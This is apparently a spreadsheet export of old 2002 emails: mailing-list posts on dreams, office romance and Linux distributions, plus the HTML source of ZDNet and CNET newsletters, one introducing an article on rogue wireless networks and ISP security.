 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5r7tUTmu1HiqzUbrvLkiDeR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFraA859OeNn9kgGa2oXqGyR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8BzG99IDFWVhZSgRXBnR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZx2oBlTNIOiJGu_NEsnEuR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnWYPzC51C53xlZk0f-IosR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZXeNukzs1qwuBXvl3NU2FR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04msp9vSjaeTldfVpf4R" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1AMUzmn0dAVJ9PZAKTrR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e505&amp;ISSUE=2002-07-19" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=b1-YzzzJ-x0nIpcCWJ66tnQmlHWbW9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday 09 September 2002 09:51 pm, Geege Schuman wrote
 &gt; ever notice how the feelings evoked in some dreams stick with you all
 &gt; day?i'm sure it's some neurochemical process initiated during the dream
 &gt; that is still cycling thru - like a deja vu, triggered by memory
 &gt; processes, where &gt; you don't actually remember but you feel like you're
 &gt; remembering.
 Absolutely, and I've wanted to recapture it.  I've done some writing based 
 on dreams, and there is a mysterious "mood" to that feeling that drives 
 some creative stuff for me.  I've never tried to write music in that 
 state, but I will next time.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Perhaps it's time to revisit ...
 http://www.engrish.com/recentdiscoveries.html
 "evirob" is the essence of weird life.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This sort of thing is, in my (limited?) experience, increasingly a thing 
 of the past. Not one person I know has found it worth the risk to pursue 
 a relationship with someone in the workplace. It's terrible to think we 
 could litigate our way into extinction...!
 Elias
 Owen Byrne wrote:
 &gt; ... The last full time job I had the sexual harassement seminar
 &gt; was pretty clear - yes you can have relationships at the office, but 
 &gt; its extremely difficult, and the pitfalls are horrendous. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] To hell with SuSE - is there a distro I can get (Was: SUSE 8 disks? (thread changed slightly))
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 07:59:21PM +0200, Paul Linehan wrote:
 &gt; 
 &gt; "John P. Looney" &lt;valen@tuatha.org&gt; a crit:
 &gt; 
 &gt; &gt; &gt; I'm confused. I thought it was GPL'ed and
 &gt; &gt; &gt; that the money you paid SuSE was for your
 &gt; &gt; &gt; 60 day support or whatever? 
 &gt;  
 &gt; &gt;  The RPMS are. The distribution as a whole work is
 &gt; &gt; copyright of SuSE.
 &gt; 
 &gt; 
 &gt; This IMHO, goes against the spirit of GPL. 
 &gt; 
 &gt; 
 &gt; Thanks for the info.
 &gt; 
 I can copy the RedHat official download ISO's. I can't
 call it redhat if I sell it, so I can give you copies
 of thread linux 7.3 if you want.
 Failing that, I have the 7 CD's from Woody (Debian 3.0).
 Otheriwse, you need to find  a different source.
 L.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Broadband ISPs wise up to wireless, defend (or don't) against hackers (CNET INTERNET SERVICES)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;&lt;head&gt;&lt;title&gt;Internet Services Weekly Newsletter&lt;/title&gt;&lt;/head&gt;
 &lt;body bgcolor=3D"#eeeeee"&gt;&lt;center&gt;
 &lt;a href=3D"top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612 bgcolor=3D"#f=
 fffff"&gt;
 &lt;tr valign=3Dtop&gt;&lt;td width=3D442 colspan=3D4&gt;&lt;img src=3D"http://www.cnet.co=
 m/i/nl/ws/hd.gif" width=3D442 height=3D60 alt=3D"Internet Services Weekly N=
 ewsletter"&gt;&lt;br&gt;
 =09=09=09&lt;table width=3D442 cellpadding=3D0 cellspacing=3D0 border=3D0 bgco=
 lor=3D"#ffcc00"&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000" colspan=3D3&gt;&lt;img src=3D"http://home=
 .cnet.com/b.gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;
 =09=09=09=09=09&lt;td bgcolor=3D"#000000" width=3D1 rowspan=3D2&gt;&lt;img src=3D"ht=
 tp://home.cnet.com/b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td width=3D10 rowspan=3D2&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" width=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09=09&lt;td  width=3D430&gt;&lt;img src=3D"http://home.cnet.com/b.gif" wid=
 th=3D"1" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.=
 gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       =09=09&lt;/table&gt;=09
 =09&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 =09&lt;td width=3D160 rowspan=3D2&gt;
 =09=09&lt;img src=3D"http://home.cnet.com/i/dp/dd_b.gif" width=3D"160" height=
 =3D"18" border=3D"0"&gt;&lt;br&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D160&gt;
 =09=09&lt;tr&gt;&lt;td align=3Dcenter bgcolor=3D"#eeeeee"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!-- tower ad --&gt;
 &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/common/adv=
 ertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D0f-RM2lIqjktmdPkg9sUb9HGRJ=
 1bfZR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/MAP BBQ_skyscraper.gif" =
 width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /tower ad --&gt;&lt;!-- right column content --&gt;
 &lt;!-- most popular NEWSLETTER --&gt;
 &lt;br&gt;&lt;img src=3D"http://www.cnet.com/i/nl/ws/rhc_pop.gif" width=3D150 height=
 =3D20 alt=3D"Most Popular"&gt;
 &lt;br&gt;&lt;font face=3D"arial, helvetica" size=3D-1 color=3D#333333&gt;
 &lt;b&gt;Reseller Accounts&lt;/b&gt;&lt;br&gt;&lt;table width=3D150 cellpadding=3D2 cellspacing=
 =3D0 border=3D0&gt;&lt;tr valign=3Dtop&gt;&lt;td&gt;&lt;font face=3D"arial, helvetica" size=
 =3D-2&gt;&lt;b&gt;1.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D24-8D=
 dMIcz6q--8CI6geUef92iqrwdR" &gt;Infinology&amp;nbsp;Corp.&lt;/a&gt;, &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D39-7QgMIjI6y-waTUCCGLs-y39w-_cR" &gt;$59&lt;/a&gt;&lt;br&gt;=
 &lt;b&gt;2.&lt;/b&gt;&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D4e-0Y95InZA=
 4ufV6aJIKlsTn8N_JjiR" &gt;ReadyHosting.com&lt;/a&gt;, &lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3D63-tPKjIHWSsaa7VWtg_9-hwkp_WElR" &gt;$4.12&lt;/a&gt;&lt;br&gt;&lt;b&gt;3.&lt;/b&gt;=
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D78-d5asIdUDx-1LLqR5v=
 nMUN5xspo4R" &gt;Aplus.Net&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D8d-nbL1Q7no54XkOhpIiSupcptbPMuR" &gt;$79.95&lt;/a&gt;&lt;br&gt;&lt;b&gt;4.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Da2-6-M7QXZxTvb9b-K9R0CGk_HtsosR" =
 &gt;One&amp;nbsp;World&amp;nbsp;Hosting&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Cl=
 ick?q=3Db8-smr2QQUwcaz9HOOlq9S_p8qkEi9R" &gt;$10&lt;/a&gt;&lt;br&gt;&lt;b&gt;5.&lt;/b&gt;&amp;nbsp;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Dcd-VHhSQzsKThHat4OFjAi_TOlRfXuR" =
 &gt;Superb&amp;nbsp;Internet&lt;/a&gt;, &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3De2-J1OpQhyziskjKKBENBEZdihv9KsR" &gt;$5&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/font&gt;&lt;font face=3D"ari=
 al, helvetica" size=3D-1&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Df=
 7-N0QnQLgzoJWajWNlrZIGiR6ImOZR" &gt;&lt;b&gt;More providers&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;=
 /tr&gt;&lt;/table&gt;
 &lt;!-- /most popular NEWSLETTER --&gt;
 &lt;br&gt;
 &lt;!-- Vertical Brick --&gt;
  &lt;IMG alt=3D"Also from CNET" height=3D20 src=3D"http://home.cnet.com/Ads/Me=
 dia/Images/RHC_ALSOfromCNETnet.gif" width=3D150 NOSEND=3D"1"&gt;&lt;BR&gt;
 &lt;TABLE border=3D0 cellPadding=3D2 cellSpacing=3D0 width=3D150&gt;&lt;TBODY&gt;&lt;TR vA=
 lign=3Dtop&gt;
 &lt;TD&gt;&lt;FONT face=3D"arial, helvetica" size=3D-1&gt;&lt;B&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D0c-_Y3DIc8HTzkCJaQWDjP2qJ1=
 3b4dR" &gt;Live tech help now&lt;/a&gt;&lt;p&gt;=20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D21-UPROIjdDVFrmG_8oQqYoj1c=
 TQ4cR" &gt;May's Editors' Choice&lt;/a&gt;&lt;p&gt; =20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D36-wg7-IiI4oUHRfj_MxvH3Qai=
 nXQRR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;=20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D4b-k_l7IBUPPQwb39aP9VA35c5=
 4JMlR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;=20
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D61-x9oAIoLj9Wf2Yu24JYndFK-=
 AWlrR" &gt;ZDNet: PeopleSoft &lt;/a&gt;=20
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;/td&gt;&lt;td width=3D9 rowspan=3D2&gt;&lt;img src=3D"http://www.cnet.com/i/nl/dd_c.gi=
 f" width=3D9 height=3D60&gt;&lt;br&gt;
 &lt;table width=3D9 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D9 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#ffccoo"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D10&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000" rowspan=3D2&gt;&lt;table width=3D1 cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
 =09&lt;tr&gt;&lt;td bgcolor=3D"#eeeeee"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=
 =3D1 height=3D60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D410 bgcolor=3D"#ffffff"&gt;
 =09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410 bgcolor=
 =3D"#ffffef"&gt;
 =09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09&lt;td width=3D10&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" wi=
 dth=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;td width=3D412&gt;
 =09=09
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" =
 border=3D"0"&gt;&lt;font face=3D"Arial, Helvetica" size=3D"-2"&gt;July 11, 2002&lt;/fon=
 t&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D412&gt;
 =09=09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09=09=09&lt;td width=3D76 align=3Dright&gt;
 =09=09=09=09=09=09&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/sw/lindseyt.gi=
 f" width=3D66 height=3D86&gt;&lt;br&gt;
 =09=09=09=09=09=09&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#666=
 666"&gt;
 --&lt;A HREF=3D"mailto:software_mailbag@cnet.com"&gt;Lindsey Turrentine&lt;/A&gt;&lt;br&gt;
 Senior editor&lt;br&gt;
 CNET Software and Internet&lt;br&gt;&lt;/font&gt;
 =09=09=09&lt;/td&gt;&lt;td width=3D10&gt; &lt;/td&gt;
 =09=09=09&lt;td&gt;&lt;font face=3D"Arial, Helvetica"&gt;
 =09=09=09&lt;font color=3D"#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 =09=09=09&lt;font size=3D"-1"&gt;
 Your ISP, if it's anything like mine, works like a very large
 boat: It moves slowly, it turns slowly, and sometimes it leaks.
 Take rogue wireless networks, for example. For many months now,
 some mischievous entrepreneurs have been hacking into major ISP
 networks and siphoning off bandwidth for neighborhood wireless
 networks. Only now, months later, are broadband bigwigs &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D76-vJf7InBP3QcLqhr1okYP2r70U6iR" &gt;&lt;B&gt;doing
 something about it&lt;/b&gt;&lt;/a&gt;. And what
 about ISP hackers? Could they break into your service provider?
 Probably. Thankfully, you can protect yourself against most of
 these leaks. Let Dan Tynan, our ISP guru, &lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D8b-SBGBQY0y_2bkiJ1EYIEElDh4B1FR" &gt;&lt;B&gt;show you how&lt;/b&gt;&lt;/a&gt;.
 &lt;P&gt;
 =09=09&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;/table&gt;
 =09=09=09=09&lt;/td&gt;
 =09=09=09=09&lt;td width=3D8&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" =
 width=3D"8" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!--Info Button Bar Web Hosting --&gt;
 &lt;table cellpadding=3D0 width=3D"100%"&gt;
   &lt;tr&gt;
     &lt;td align=3Dcenter&gt;
       &lt;table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
 "&gt;
 =09    &lt;tr&gt;
 =09=09  &lt;td align=3D"center" colspan=3D"5"&gt;&lt;img src=3D"http://www.cnet.com/=
 Ads/Media/Images/ad10-dk.gif" width=3D"120" height=3D"10" alt=3D"advertisem=
 ent"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"middle"&gt;
           &lt;td colspan=3D"5" bgcolor=3D"#999999" height=3D"15" class=3D"w"&gt;&lt;=
 b class=3D"v1"&gt;&lt;font face=3D"verdana,geneva,helvetica" size=3D"-2" color=3D=
 "#ffffff"&gt;&lt;b&gt; Quick links to Services &amp; Prices from these companies&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
 =09=09&lt;tr valign=3D"middle" align=3D"center" bgcolor=3D"#eeeeee"&gt;
 =09=09  &lt;td height=3D"35"&gt; &lt;/td&gt;
 =09=09  &lt;FORM action=3Dhttp://www.cnet.com/cgi-acc/clickthru.acc method=3Dg=
 et&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.dellhost-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservi=
 ces.cnet.com%2fcgi%2fpremier.asp%3fcid%3d1006102&gt;&lt;INPUT type=3Dsubmit value=
 =3D"    DellHost    "&gt;&lt;/td&gt;&lt;/form&gt;&lt;FORM action=3Dhttp://www.cnet.com/cgi-ac=
 c/clickthru.acc method=3Dget&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.aplus-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservices=
 .cnet.com%2fcgi%2fpremier.asp%3fcid%3d1000015&gt; &lt;INPUT type=3Dsubmit value=
 =3D"    Aplus.Net   "&gt;&lt;/td&gt;&lt;/form&gt;
 =09=09  &lt;td&gt; &lt;/td&gt;
 =09=09&lt;/tr&gt;
 =09  &lt;/table&gt;   =20
 =09&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--/Info Button Bar Web Hosting --&gt;
 =09&lt;!-- bottom rule --&gt;
 =09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410&gt;
 =09&lt;tr valign=3Dtop&gt;
 =09=09&lt;td bgcolor=3D"#F7D69C"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=
 =3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 =09&lt;/table&gt;
 =09
 &lt;table border=3D"0" width=3D"100%" cellpadding=3D"10" cellspacing=3D"0"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;img src=3D"http://www.cnet.com/i/gl/new-cc.gif" alt=3D"Crucial Clicks" wid=
 th=3D"120" height=3D"19" border=3D"0"&gt;&lt;br&gt;
 &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0" bgc=
 olor=3D"#ffffff"&gt;
 &lt;tr bgcolor=3D"#cccccc"&gt;&lt;td colspan=3D"7"&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D"#cccccc" rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" height=3D1 width=3D1&gt;&lt;/td&gt;
 &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=
 =3D5&gt;&lt;/td&gt;
 &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D5 width=
 =3D1&gt;&lt;/td&gt;
 &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=
 =3D5&gt;&lt;/td&gt;
 &lt;td bgcolor=3D"#cccccc" rowspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" height=3D1 width=3D1&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=3D"top"&gt;
 &lt;td width=3D"100%"&gt;
 =09&lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 =09&lt;tr valign=3D"top"&gt;
 =09&lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Da0-11h=
 8QQBqXB2HwGiUByjw2PB1s79R" &gt;&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/p/03210=
 2_megapixcameras.jpg" width=3D"85" height=3D"110" border=3D"0" alt=3D"" /&gt;&lt;=
 /a&gt;&lt;/td&gt;
 =09&lt;td width=3D"5"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=
 =3D5&gt;&lt;/td&gt;
 =09&lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3Db5-50FcQ7U7vBndU_R1PHq15ZNEEZuR" =
 &gt;&lt;b&gt;5-megapixel shoot-out&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;Not all high-res cameras were create=
 d alike. We put four to the test to find out what sets each apart.&lt;/font&gt;&lt;/=
 td&gt;
 =09&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D3=
  width=3D1&gt;&lt;br /&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 =09&amp;#149; &lt;a href=3D"http://clickthru.online.com/Click?q=3Dca-iciuQUgFRmzCV=
 TQcl8jfOfRHHUsR" &gt;Cameras coming soon&lt;/a&gt;&lt;br /&gt;
 =09&amp;#149; &lt;a href=3D"http://clickthru.online.com/Click?q=3De0-cISRQfDH08pTG=
 wYkPhB7mxUT9A9R" &gt;Point-and-shoot picks&lt;/a&gt;&lt;br /&gt;
 =09&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;/table&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;img src=3D"http://home.cnet.com/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;
 &lt;td width=3D"180"&gt;
 =09&lt;table cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"0" bg=
 color=3D"#ffffef"&gt;
 =09&lt;tr&gt;&lt;td colspan=3D"5" bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.c=
 om/b.gif" width=3D"1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;tr&gt;
 =09&lt;td bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D=
 "1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;td&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" al=
 t=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;td&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://=
 home.cnet.com/b.gif" width=3D"1" height=3D"5" alt=3D"" border=3D"0" /&gt;&lt;br /=
 &gt;
 =09&lt;font face=3D"arial, helvetica" color=3D"#666666" size=3D"-1"&gt;&lt;b&gt;Most po=
 pular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" h=
 eight=3D"5" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =09&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1"=
  height=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =091. &lt;a href=3D"http://clickthru.online.com/Click?q=3Df5-lTbRQgwx1jamoZg6D=
 mLwgkaZmRuR" &gt;Dell Dimension 4400&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =092. &lt;a href=3D"http://clickthru.online.com/Click?q=3D0a-ZnKCIrrscy9q3rUBw=
 hq6GOxuYzsR" &gt;Sony VAIO PCV-RX650&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =093. &lt;a href=3D"http://clickthru.online.com/Click?q=3D1f-rvwqI58w5nHc5A01x=
 mYgHobjqmZR" &gt;Dell Dimension 4400 for Home&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home=
 .cnet.com/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =094. &lt;a href=3D"http://clickthru.online.com/Click?q=3D34-pJpSIcd81RqArU33_=
 tvVyn4IcgdR" &gt;Dell Dimension 8200&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =095. &lt;a href=3D"http://clickthru.online.com/Click?q=3D49-ZM4cIEpSeyU90gbVX=
 4RVXFO5JSrR" &gt;Dell Optiplex GX240&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =09&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width=3D"13" he=
 ight=3D"13" border=3D"0" alt=3D"" align=3D"absmiddle" /&gt; &lt;b&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D5e-ssGdIn06t0yIdenhsnStcVTQzciR" &gt;See all=
  most popular&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
 =09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"10" alt=3D=
 "" border=3D"0" /&gt;&lt;br /&gt;
 =09&lt;/font&gt;&lt;/td&gt;
 =09&lt;td&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" al=
 t=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;td bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D=
 "1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td colspan=3D"5" bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.c=
 om/b.gif" width=3D"1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
